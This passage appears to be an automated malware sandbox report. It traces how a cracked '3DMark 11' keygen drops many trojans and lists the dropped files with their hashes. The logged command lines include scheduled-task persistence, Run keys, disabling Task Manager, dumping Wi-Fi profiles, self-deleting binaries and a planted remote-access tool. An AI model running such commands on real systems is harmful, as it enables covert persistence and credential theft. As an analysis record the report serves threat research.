              PID:5028
            • C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe" /W
              PID:3820
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /create /tn {D67AEED2-E6B3-46A8-A598-592545B18773} /tr "\"C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe\"" /sc HOURLY /mo 5 /F
              Creates scheduled task(s)
              PID:2016
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn axhotbr /tr "\"C:\Users\Admin\AppData\Roaming\27.exe\" /I axhotbr" /SC ONCE /Z /ST 17:28 /ET 17:40
            Creates scheduled task(s)
            PID:4564
        • C:\Users\Admin\AppData\Roaming\28.exe
          C:\Users\Admin\AppData\Roaming\28.exe
          Checks QEMU agent file
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of SetWindowsHookEx
          PID:4084
        • C:\Users\Admin\AppData\Roaming\29.exe
          C:\Users\Admin\AppData\Roaming\29.exe
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:2548
          • C:\Windows\SysWOW64\regsvr32.exe
            C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Roaming\29.dll f1 C:\Users\Admin\AppData\Roaming\29.exe@2548
            PID:1600
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Roaming\29.dll,f0
              Blocklisted process makes network request
              PID:3596
        • C:\Users\Admin\AppData\Roaming\30.exe
          C:\Users\Admin\AppData\Roaming\30.exe
          Drops startup file
          Suspicious use of SetThreadContext
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of FindShellTrayWindow
          Suspicious use of SendNotifyMessage
          PID:948
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\MSBuild.exe"
            Drops file in Drivers directory
            Adds Run key to start application
            PID:4948
            • C:\Windows\SysWOW64\REG.exe
              REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
              Modifies registry key
              PID:3552
            • C:\Windows\SysWOW64\netsh.exe
              "netsh" wlan show profile
              PID:4724
        • C:\Users\Admin\AppData\Roaming\31.exe
          C:\Users\Admin\AppData\Roaming\31.exe
          Checks QEMU agent file
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious behavior: CmdExeWriteProcessMemorySpam
          Suspicious use of SetWindowsHookEx
          PID:3324
    • C:\Users\Admin\Desktop\3DMark 11 Advanced Edition.exe
      "C:\Users\Admin\Desktop\3DMark 11 Advanced Edition.exe"
      Executes dropped EXE
      PID:488
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen.bat" "
        PID:3904
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\intro.exe
          intro.exe 1O5ZF
          Modifies system certificate store
          PID:2228
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-pr.exe
          keygen-pr.exe -p83fsase3Ge
          PID:1556
          • C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe"
            PID:4452
            • C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe -txt -scanlocal -file:potato.dat
              PID:5024
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-1.exe
          keygen-step-1.exe
          PID:2140
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exe
          keygen-step-2.exe
          Suspicious use of SetWindowsHookEx
          PID:2016
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exe" >> NUL
            PID:2196
            • C:\Windows\SysWOW64\PING.EXE
              ping 127.0.0.1
              Runs ping.exe
              PID:2296
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-3.exe
          keygen-step-3.exe
          PID:3704
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-3.exe"
            PID:2288
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              Runs ping.exe
              PID:5064
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-4.exe
          keygen-step-4.exe
          PID:3792
          • C:\Users\Admin\AppData\Local\Temp\RarSFX9\002.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX9\002.exe"
            Suspicious use of SetWindowsHookEx
            PID:4224
          • C:\Users\Admin\AppData\Local\Temp\RarSFX9\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX9\Setup.exe"
            PID:2992
            • C:\Users\Admin\AppData\Local\Temp\sibADCE.tmp\0\setup.exe
              "C:\Users\Admin\AppData\Local\Temp\sibADCE.tmp\0\setup.exe" -s
              PID:4812
              • C:\Program Files (x86)\9ku5npt6tedk\aliens.exe
                "C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"
                Writes to the Master Boot Record (MBR)
                Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:3752
                • C:\Windows\SysWOW64\msiexec.exe
                  msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
                  Enumerates connected drives
                  Suspicious behavior: GetForegroundWindowSpam
                  Suspicious use of FindShellTrayWindow
                  PID:2852
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"
                  PID:1220
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 3
                    Runs ping.exe
                    PID:3816
          • C:\Users\Admin\AppData\Local\Temp\RarSFX9\jg2_2qua.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX9\jg2_2qua.exe"
            PID:2736
    • C:\Windows\SysWOW64\cmmon32.exe
      "C:\Windows\SysWOW64\cmmon32.exe"
      Adds policy Run key to start application
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      PID:2428
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Roaming\2.exe"
        PID:2532
    • C:\Windows\SysWOW64\mstsc.exe
      "C:\Windows\SysWOW64\mstsc.exe"
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Modifies Internet Explorer settings
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      PID:3636
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Roaming\18.exe"
        PID:3000
    • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
      "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      PID:3844
      • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
        "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        PID:1548
    • C:\Windows\SysWOW64\autoconv.exe
      "C:\Windows\SysWOW64\autoconv.exe"
      PID:3100
    • C:\Windows\SysWOW64\mstsc.exe
      "C:\Windows\SysWOW64\mstsc.exe"
      PID:2768
    • C:\Windows\SysWOW64\cmmon32.exe
      "C:\Windows\SysWOW64\cmmon32.exe"
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Modifies Internet Explorer settings
      Suspicious behavior: MapViewOfSection
      PID:4560
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Roaming\11.exe"
        PID:4420
    • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
      "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      PID:2416
      • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
        "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        PID:1568
    • C:\Program Files (x86)\Zfx4lo\helpqrqlwhj.exe
      "C:\Program Files (x86)\Zfx4lo\helpqrqlwhj.exe"
      Maps connected drives based on registry
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      PID:3432
    • C:\Windows\SysWOW64\help.exe
      "C:\Windows\SysWOW64\help.exe"
      PID:1972
    • C:\Windows\SysWOW64\colorcpl.exe
      "C:\Windows\SysWOW64\colorcpl.exe"
      PID:4976
    • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
      "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      PID:5052
      • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
        "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        PID:4032
    • C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\SysWOW64\rundll32.exe"
      PID:3692
    • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
      "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      PID:4680
      • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
        "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        PID:2412
    • C:\Windows\SysWOW64\ipconfig.exe
      "C:\Windows\SysWOW64\ipconfig.exe"
      Gathers network information
      PID:5272
    • C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe
      "C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe"
      Checks BIOS information in registry
      Maps connected drives based on registry
      Suspicious use of SetThreadContext
      PID:5768
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnLKhBlJfQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4FE5.tmp"
        Creates scheduled task(s)
        PID:1680
      • C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe
        "{path}"
        Suspicious use of SetThreadContext
        PID:4616
    • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
      "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      PID:5020
      • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
        "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        PID:3580
        • C:\Windows\SysWOW64\NETSTAT.EXE
          "C:\Windows\SysWOW64\NETSTAT.EXE"
          Gathers network information
          PID:2920
    • C:\Windows\SysWOW64\autochk.exe
      "C:\Windows\SysWOW64\autochk.exe"
      PID:2312
    • C:\Windows\SysWOW64\autofmt.exe
      "C:\Windows\SysWOW64\autofmt.exe"
      PID:4708
    • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
      "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      PID:3256
      • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe
        "C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        PID:4424
    • C:\Windows\SysWOW64\systray.exe
      "C:\Windows\SysWOW64\systray.exe"
      PID:3640
    • C:\Windows\SysWOW64\msdt.exe
      "C:\Windows\SysWOW64\msdt.exe"
      PID:5612
  • C:\ProgramData\Windows\rutserv.exe
    C:\ProgramData\Windows\rutserv.exe
    Executes dropped EXE
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of SetWindowsHookEx
    PID:2280
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x520
    Suspicious use of AdjustPrivilegeToken
    PID:2660
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {9ED4442B-3F45-4DFB-955D-CC52BE690C72} S-1-5-21-3825035466-2522850611-591511364-1000:EIDQHRRL\Admin:Interactive:[1]
    PID:3216
    • C:\Programdata\RealtekHD\taskhost.exe
      C:\Programdata\RealtekHD\taskhost.exe
      Drops file in System32 directory
      Suspicious behavior: GetForegroundWindowSpam
      PID:3516
      • C:\Programdata\WindowsTask\winlogon.exe
        C:\Programdata\WindowsTask\winlogon.exe
        PID:1552
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /C schtasks /query /fo list
          PID:2744
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /query /fo list
            PID:3448
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\AnLKhBlJfQ" /F
          PID:2144
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Delete /TN "Updates\AnLKhBlJfQ" /F
            PID:3308
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\AnLKhBlJfQ" /F
          PID:5440
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Delete /TN "Updates\AnLKhBlJfQ" /F
            PID:5756
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\qATVyEXYNcqQZF" /F
          PID:2104
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Delete /TN "Updates\qATVyEXYNcqQZF" /F
            PID:4884
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\qATVyEXYNcqQZF" /F
          PID:3572
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Delete /TN "Updates\qATVyEXYNcqQZF" /F
            PID:3836
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\wWTxgR" /F
          PID:2976
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Delete /TN "Updates\wWTxgR" /F
            PID:4320
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\wWTxgR" /F
          PID:1304
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Delete /TN "Updates\wWTxgR" /F
            PID:5296
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        PID:3324
    • C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      PID:3420
    • C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      PID:4856
    • C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      PID:1444
    • C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      PID:2980
    • C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      PID:5128
    • C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      PID:688
    • C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      PID:5864
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    Suspicious use of AdjustPrivilegeToken
    PID:2800
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    Enumerates connected drives
    PID:2264
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding C715B638DCD0275E9924148DADA4DC31 C
      PID:3588
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 7149B171DBF515120FD73317ACE2DD0E C
      PID:5836
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k NetworkService
    Drops file in System32 directory
    Modifies data under HKEY_USERS
    Suspicious behavior: LoadsDriver
    PID:3608
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    PID:5940
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x224
    PID:5656
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {A93D8764-8FF3-462F-8120-46B3D3608D96} S-1-5-18:NT AUTHORITY\System:Service:
    PID:4540
Network
Replay Monitor
00:00 00:00
Downloads
  • C:\Program Files (x86)\9ku5npt6tedk\aliens.exe

  • C:\Program Files (x86)\9ku5npt6tedk\aliens.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe

  • C:\Program Files (x86)\Zfx4lo\helpqrqlwhj.exe

  • C:\Program Files (x86)\Zfx4lo\helpqrqlwhj.exe

  • C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe

  • C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe

  • C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe

  • C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe

  • C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe

  • C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe

  • C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe

  • C:\Program Files\Common Files\System\iediagcmd.exe

  • C:\ProgramData\ADiag\Debug\Adlice Diag_debug.log

  • C:\ProgramData\ADiag\advert

  • C:\ProgramData\ADiag\config.ini

  • C:\ProgramData\ADiag\scheduler

  • C:\ProgramData\Microsoft\Check\Check.txt

  • C:\ProgramData\Microsoft\Intel\R8.exe

  • C:\ProgramData\Microsoft\Intel\R8.exe

  • C:\ProgramData\Microsoft\Intel\taskhost.exe

  • C:\ProgramData\Microsoft\Intel\taskhost.exe

  • C:\ProgramData\Microsoft\Intel\wini.exe

  • C:\ProgramData\Microsoft\Intel\wini.exe

  • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta

  • C:\ProgramData\Microsoft\temp\Log.txt

  • C:\ProgramData\RDPWinst.exe

  • C:\ProgramData\RealtekHD\taskhost.exe

  • C:\ProgramData\RealtekHD\taskhost.exe

  • C:\ProgramData\RealtekHD\taskhost.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\WindowsTask\OpenCL.DLL

  • C:\ProgramData\WindowsTask\azur.exe

  • C:\ProgramData\WindowsTask\azur.exe

  • C:\ProgramData\WindowsTask\system.exe

    MD5

    49e31c4bcd9f86ba897dc7e64176dc50

    SHA1

    cbf0134bd25fd631c3baae23b9e5c79dffef870a

    SHA256

    006c8ee1ba292e19b1ee6d74d2eb3f8ca8f2c5a9e51a12b37501ea658e10c641

    SHA512

    b1ffb2eb281bd773eecfbf6df1d92073cba3298749736c775a82974f80cc938ffcf281a9cfd6bb0f8aa9961f9ee92e9a641cddae4f9e141190fdc569a24b1d70

  • C:\ProgramData\WindowsTask\system.exe

    MD5

    49e31c4bcd9f86ba897dc7e64176dc50

    SHA1

    cbf0134bd25fd631c3baae23b9e5c79dffef870a

    SHA256

    006c8ee1ba292e19b1ee6d74d2eb3f8ca8f2c5a9e51a12b37501ea658e10c641

    SHA512

    b1ffb2eb281bd773eecfbf6df1d92073cba3298749736c775a82974f80cc938ffcf281a9cfd6bb0f8aa9961f9ee92e9a641cddae4f9e141190fdc569a24b1d70

  • C:\ProgramData\WindowsTask\update.exe

    MD5

    c830b8a074455cc0777ed5bc0bfd2678

    SHA1

    bff2a96c092f8c5620a4d4621343594cd8892615

    SHA256

    3567966f3f2aa2e44d42b4bd3adae3c5bb121296c1901f69547ad36cd0d0f5f9

    SHA512

    c90eb64fee3ab08b8f23fc8958fd7f69c1decbe4295d071d07dc427042e53796edf511e7d61600dcdb7d7429925135f42752e199785049134ac7c0dbbf15f541

  • C:\ProgramData\WindowsTask\update.exe

    MD5

    c830b8a074455cc0777ed5bc0bfd2678

    SHA1

    bff2a96c092f8c5620a4d4621343594cd8892615

    SHA256

    3567966f3f2aa2e44d42b4bd3adae3c5bb121296c1901f69547ad36cd0d0f5f9

    SHA512

    c90eb64fee3ab08b8f23fc8958fd7f69c1decbe4295d071d07dc427042e53796edf511e7d61600dcdb7d7429925135f42752e199785049134ac7c0dbbf15f541

  • C:\ProgramData\WindowsTask\winlogon.exe

    MD5

    ec0f9398d8017767f86a4d0e74225506

    SHA1

    720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

    SHA256

    870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

    SHA512

    d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

  • C:\ProgramData\Windows\install.vbs

  • C:\ProgramData\Windows\reg1.reg

  • C:\ProgramData\Windows\reg2.reg

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\vp8decoder.dll

    MD5

    88318158527985702f61d169434a4940

    SHA1

    3cc751ba256b5727eb0713aad6f554ff1e7bca57

    SHA256

    4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

    SHA512

    5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

  • C:\ProgramData\Windows\vp8encoder.dll

    MD5

    6298c0af3d1d563834a218a9cc9f54bd

    SHA1

    0185cd591e454ed072e5a5077b25c612f6849dc9

    SHA256

    81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

    SHA512

    389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

  • C:\ProgramData\Windows\winit.exe

  • C:\ProgramData\Windows\winit.exe

  • C:\ProgramData\install\cheat.exe

  • C:\ProgramData\install\utorrent.exe

    MD5

    8590e82b692b429189d114dda535b6e8

    SHA1

    5d527ad806ac740e2e2769f149270be6a722e155

    SHA256

    af5d5c340c063e7f4a70bd55ce1634b910e5d43d59c1008b4ad38d2c52c8db7d

    SHA512

    0747d770a6e5cc1fcd0b3ed060eaaa37531c9483620253aec8fc8fb472435d14b235e10339e52a41a563a0bc9af4e109940a71bb4e08495563ef7c581e962fda

  • C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibCa.dll

  • C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibCa.dll

  • C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibClr.dll

  • C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibClr.dll

  • C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\sib.dat

  • C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\sib.dat

  • C:\Programdata\Install\del.bat

  • C:\Programdata\Install\utorrent.exe

    MD5

    8590e82b692b429189d114dda535b6e8

    SHA1

    5d527ad806ac740e2e2769f149270be6a722e155

    SHA256

    af5d5c340c063e7f4a70bd55ce1634b910e5d43d59c1008b4ad38d2c52c8db7d

    SHA512

    0747d770a6e5cc1fcd0b3ed060eaaa37531c9483620253aec8fc8fb472435d14b235e10339e52a41a563a0bc9af4e109940a71bb4e08495563ef7c581e962fda

  • C:\Programdata\RealtekHD\taskhostw.exe

  • C:\Programdata\WindowsTask\winlogon.exe

    MD5

    ec0f9398d8017767f86a4d0e74225506

    SHA1

    720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

    SHA256

    870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

    SHA512

    d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

  • C:\Programdata\Windows\install.bat

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1FC0448E6D3D5712272FAF5B90A70C5E

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1FC0448E6D3D5712272FAF5B90A70C5E

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82CB34DD3343FE727DF8890D352E0D8F

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\85B3F147E3624A14E6A20DB4F6C2C5D9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9FF67FB3141440EED32363089565AE60_1E9C69B81893CED35518318987DF02B9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC4FEA46495CA161D470CD085EDBAADE

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B

